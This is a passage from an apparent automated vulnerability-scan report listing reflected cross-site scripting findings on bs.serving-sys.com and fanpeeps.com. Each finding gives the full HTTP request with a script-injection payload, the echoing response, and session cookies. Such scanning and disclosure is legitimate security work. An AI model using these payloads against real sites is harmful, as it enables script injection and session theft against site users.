GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=c682f"%3balert(1)//e44e08c8f5b&npu=$$$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/v%3B240157455%3B0-0%3B0%3B13112524%3B4307-300/250%3B41771240/41789027/1%3Bu%3D%5E%5E%3B%7Eokv%3D%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D233%3Bu%3D%5E%5E%3Bbiz%3D1053%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3Btile%3D6%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:45 GMT
Connection: close
Content-Length: 2843

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.ta="-1";ebO.dg="-1";ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys.com");ebO.p=escape("c682f";alert(1)//e44e08c8f5b");ebO.ju=escape(ebTokens("http://www.spdr-etfs.com/dividends/"));ebO.ncu=escape("http://ad.doubleclick.net/click;h=v8/3b07/3/0/*/v;240157455;0-0;0;13112524;4307-300/250;41771240/41789027/1;u=^^;~okv=;
...[SNIP]...

4.56. http://bs.serving-sys.com/BurstingPipe/adServer.bs [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5bc52'><script>alert(1)</script>19b91e4c95 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=5bc52'><script>alert(1)</script>19b91e4c95&npu=$$$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/v%3B240157455%3B0-0%3B0%3B13112524%3B4307-300/250%3B41771240/41789027/1%3Bu%3D%5E%5E%3B%7Eokv%3D%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D233%3Bu%3D%5E%5E%3Bbiz%3D1053%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3Btile%3D6%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:45 GMT
Connection: close
Content-Length: 2893

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
<img src='http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2319721&Page=5bc52'><script>alert(1)</script>19b91e4c95&PluID=0&EyeblasterID=4772648&Pos=406772216914548&ord=[timestamp]' border=0 width=300 height=250>
...[SNIP]...

4.57. http://fanpeeps.com/ [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d860e'><script>alert(1)</script>a93ef963722 was submitted in the action parameter. This input was echoed as d860e\'><script>alert(1)</script>a93ef963722 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=newsd860e'><script>alert(1)</script>a93ef963722&pid=18&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:03 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 45886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=action value='newsd860e\'><script>alert(1)</script>a93ef963722'>
...[SNIP]...

4.58. http://fanpeeps.com/ [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 611c2><script>alert(1)</script>1a9e8006079 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news611c2><script>alert(1)</script>1a9e8006079&pid=18&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 45880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=action value=news611c2><script>alert(1)</script>1a9e8006079>
...[SNIP]...

4.59. http://fanpeeps.com/ [idol parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the idol request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 693c9"><script>alert(1)</script>efaf97ed0bd was submitted in the idol parameter. This input was echoed as 693c9\"><script>alert(1)</script>efaf97ed0bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=18&idol=1693c9"><script>alert(1)</script>efaf97ed0bd HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<a href="/?pid=18&idol=1693c9\"><script>alert(1)</script>efaf97ed0bd&action=tweets">
...[SNIP]...

4.60. http://fanpeeps.com/ [idol parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the idol request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 562ed><script>alert(1)</script>c231ddca073 was submitted in the idol parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=18&idol=1562ed><script>alert(1)</script>c231ddca073 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=idol value=1562ed><script>alert(1)</script>c231ddca073>
...[SNIP]...

4.61. http://fanpeeps.com/ [iid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the iid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 47b75><script>alert(1)</script>00fe593e9e0 was submitted in the iid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=18&iid=647b75><script>alert(1)</script>00fe593e9e0 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=idol value=647b75><script>alert(1)</script>00fe593e9e0>
...[SNIP]...

4.62. http://fanpeeps.com/ [iid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the iid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce21d"><script>alert(1)</script>153bac35617 was submitted in the iid parameter. This input was echoed as ce21d\"><script>alert(1)</script>153bac35617 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=18&iid=6ce21d"><script>alert(1)</script>153bac35617 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<a href="/?pid=18&idol=6ce21d\"><script>alert(1)</script>153bac35617&action=tweets">
...[SNIP]...

4.63. http://fanpeeps.com/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload c375d><script>alert(1)</script>eb27e03bf16 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=18c375d><script>alert(1)</script>eb27e03bf16&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10397

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a rel=nofollow href=/?action=home&pid=-1&zpid=18c375d><script>alert(1)</script>eb27e03bf16>
...[SNIP]...

4.64. http://fanpeeps.com/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6915e"><script>alert(1)</script>b9f4bf16f51 was submitted in the pid parameter. This input was echoed as 6915e\"><script>alert(1)</script>b9f4bf16f51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=186915e"><script>alert(1)</script>b9f4bf16f51&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10421

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a href="?pid=186915e\"><script>alert(1)</script>b9f4bf16f51">
...[SNIP]...

4.65. http://fanpeeps.com/ [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 37263'><script>alert(1)</script>1cd51c17292 was submitted in the pid parameter. This input was echoed as 37263\'><script>alert(1)</script>1cd51c17292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=1837263'><script>alert(1)</script>1cd51c17292&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10421

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<input type=hidden name=pid value='1837263\'><script>alert(1)</script>1cd51c17292'>
...[SNIP]...

4.66. http://fanpeeps.com/ [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96244"><script>alert(1)</script>b1b3330c6ce was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=2&q="dancing96244"><script>alert(1)</script>b1b3330c6ce with the stars" OR DWTS HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=q value="dancing96244"><script>alert(1)</script>b1b3330c6ce>
...[SNIP]...

4.67. http://fanpeeps.com/ [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b7ad</script><script>alert(1)</script>6af48e25fcb was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?pid=2&q="dancing3b7ad</script><script>alert(1)</script>6af48e25fcb with the stars" OR DWTS HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</div>');
       
        return html.join('');
       };

       twitterlib.search(' AND \"dancing3b7ad</script><script>alert(1)</script>6af48e25fcb', { limit: 30, filter: '' }, function (tweets, options) {
       var html = [];
        for (var i = 0; i < tweets.length; i++) {
           html.push(twitterlib.render(tweets[i], first, i == 0));
           first = false;
       
...[SNIP]...

4.68. http://fanpeeps.com/ [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 70654><script>alert(1)</script>1785e056dba was submitted in the q parameter. This input was echoed unmodified in the application's response.

